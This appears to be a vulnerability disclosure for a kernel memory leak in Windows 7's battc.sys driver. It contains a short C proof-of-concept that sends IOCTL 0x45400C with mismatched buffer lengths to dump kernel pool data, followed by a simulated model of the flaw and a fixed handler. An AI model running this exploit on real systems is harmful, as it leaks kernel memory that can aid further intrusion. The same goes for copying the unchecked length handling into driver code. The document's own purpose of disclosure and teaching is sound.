waliedassar

BATTC.SYS!BatteryClassIoctl Kernel Memory Disclosure

Oct 23rd, 2021
Description

Battc.sys is prone to kernel memory disclosure when the "BatteryClassIoctl" function processes IO Control Code 0x45400C. By calling the "ntdll!ZwDeviceIoControlFile" function on device "\device\compositebattery" with the "InputBufferLength" parameter set to a value much less than that of the "OutputBufferLength" parameter, we cause the "nt!IopCompleteRequest" function to leak data to the output buffer. This is due to the "BatteryClassIoctl" function not sanitizing

    pIRP->IoStatus.Information,
    pIRP->Tail.Overlay.CurrentStackLocation.Parameters.DeviceIoControl.OutputBufferLength and
    pIRP->AssociatedIrp.SystemBuffer.
  11.  
---- Reproduced as follows ---------------

    // Prerequisites not shown on the page: hDevice is an open handle to
    // "\device\compositebattery", pIn and pOut are two 0x1000-byte user-mode
    // buffers, and ZwDeviceIoControlFile is resolved from ntdll.
    memset(pIn, 0xCC, 0x1000);
    memset(pOut, 0xCC, 0x1000);

    IO_STATUS_BLOCK IOB = {0};
    ULONG IoCode = 0x45400C;

    ULONG InSize = 0x10;
    ULONG OutSize = 0x1000; // increase this value to disclose more

    printf("InSize: %X, OutSize: %X\r\n", InSize, OutSize);

    NTSTATUS ret = ZwDeviceIoControlFile(hDevice,
                                         0 /*hEvent*/,
                                         0 /*ApcRoutine*/,
                                         0 /*ApcContext*/,
                                         &IOB,
                                         IoCode,
                                         pIn,
                                         InSize,
                                         pOut,
                                         OutSize);

    printf("ZwDeviceIoControlFile, ret: %X\r\n", ret);
    // DumpHex_8 is the author's hex-dump helper; bytes of pOut past the first
    // InSize bytes were filled by the kernel, not by the caller.
    DumpHex_8(pOut, 0x1000);
//------------------------------------
  43.  
  44. Vulnerable file version: 6.1.7600.16385
  45.  
Tested on Windows 7 64-bit SP1
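The leak described above follows from the METHOD_BUFFERED contract: the I/O manager allocates one pool buffer (AssociatedIrp.SystemBuffer) sized for the larger of the two lengths, copies only InputBufferLength bytes of caller data into it, the driver writes its reply into that same buffer, and on completion the I/O manager copies IoStatus.Information bytes back to the caller's output buffer. A driver that reports more bytes than it actually wrote hands the uninitialised remainder of the allocation to user mode, which is exactly what a small input length paired with a large output length exposes. The plain C model below is an added example, not code from the paste or from battc.sys: it decodes the fields of the IOCTL code, then runs an unchecked handler and a length-validating handler through the same simulated request and completion path and counts how many bytes of pool residue reach the caller. The names (model_irp, build_irp, leaked_bytes, handler_checked, POOL_RESIDUE), the 4-byte reply size and the cap at OutputBufferLength in complete_request are constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CTL_CODE layout: DeviceType << 16 | RequiredAccess << 14 | Function << 2 | Method. */
typedef struct {
    unsigned device_type, access, function, method;
} ctl_fields;

ctl_fields decode_ctl_code(uint32_t code) {
    ctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2) & 0xFFF;
    f.method      = code & 0x3;          /* 0 == METHOD_BUFFERED */
    return f;
}

/* Model of the IRP fields the advisory names (constructed for this example). */
typedef struct {
    uint8_t *system_buffer;   /* AssociatedIrp.SystemBuffer: one pool buffer for input and output */
    size_t   in_len;          /* Parameters.DeviceIoControl.InputBufferLength */
    size_t   out_len;         /* Parameters.DeviceIoControl.OutputBufferLength */
    size_t   information;     /* IoStatus.Information: byte count copied back on completion */
} model_irp;

#define POOL_RESIDUE 0x5A     /* constructed stand-in for stale data left in the pool allocation */
#define USER_FILL    0xCC     /* same fill pattern the paste's PoC uses for its user buffers */
#define REPLY_LEN    4        /* the model handler produces a 4-byte reply */

/* I/O manager, request side: one buffer of max(in_len, out_len); only in_len bytes are initialised. */
static void build_irp(model_irp *irp, uint8_t *pool, const uint8_t *user_in,
                      size_t in_len, size_t out_len) {
    size_t alloc = in_len > out_len ? in_len : out_len;
    memset(pool, POOL_RESIDUE, alloc);   /* what "uninitialised" looks like in this model */
    memcpy(pool, user_in, in_len);
    irp->system_buffer = pool;
    irp->in_len = in_len;
    irp->out_len = out_len;
    irp->information = 0;
}

/* Handler that never checks the lengths and reports the whole output buffer as written. */
static void handler_unchecked(model_irp *irp) {
    memset(irp->system_buffer, 0x11, REPLY_LEN);
    irp->information = irp->out_len;     /* everything past REPLY_LEN was never written by the driver */
}

/* Handler that validates up front and reports exactly the bytes it produced. */
static bool handler_checked(model_irp *irp) {
    if (irp->out_len < REPLY_LEN) {      /* STATUS_BUFFER_TOO_SMALL in a real driver */
        irp->information = 0;
        return false;
    }
    memset(irp->system_buffer, 0x11, REPLY_LEN);
    irp->information = REPLY_LEN;
    return true;
}

/* I/O manager, completion side: copy Information bytes back to the caller (model caps at out_len). */
static void complete_request(const model_irp *irp, uint8_t *user_out) {
    size_t n = irp->information < irp->out_len ? irp->information : irp->out_len;
    memcpy(user_out, irp->system_buffer, n);
}

/* Runs one request through the model and returns how many bytes of pool residue reached user space. */
size_t leaked_bytes(bool hardened, size_t in_len, size_t out_len) {
    static uint8_t pool[0x1000], user_in[0x1000], user_out[0x1000];
    model_irp irp;
    size_t i, leaked = 0;
    if (in_len > sizeof pool || out_len > sizeof pool) return 0;
    memset(user_in, USER_FILL, sizeof user_in);
    memset(user_out, USER_FILL, sizeof user_out);
    build_irp(&irp, pool, user_in, in_len, out_len);
    if (hardened) handler_checked(&irp); else handler_unchecked(&irp);
    complete_request(&irp, user_out);
    for (i = 0; i < out_len; i++)
        if (user_out[i] == POOL_RESIDUE) leaked++;
    return leaked;
}

int main(void) {
    ctl_fields f = decode_ctl_code(0x45400Cu);
    printf("0x45400C: device 0x%X access %u function 0x%X method %u\n",
           f.device_type, f.access, f.function, f.method);
    printf("unchecked handler, in 0x10 / out 0x1000: %zu residue bytes returned\n",
           leaked_bytes(false, 0x10, 0x1000));
    printf("checked handler,   in 0x10 / out 0x1000: %zu residue bytes returned\n",
           leaked_bytes(true, 0x10, 0x1000));
    return 0;
}
```

With the paste's lengths (0x10 in, 0x1000 out) the unchecked handler returns 0x1000 - 0x10 bytes of residue, and raising OutputBufferLength raises that count, matching the "increase this value to disclose more" comment in the PoC. The checked handler returns none because IoStatus.Information is tied to the bytes the driver actually produced and OutputBufferLength is rejected when it is too small. In a real driver, zeroing the shared buffer on entry (RtlZeroMemory over OutputBufferLength bytes) is a cheap second line of defence for the case where a later code path forgets the length bookkeeping.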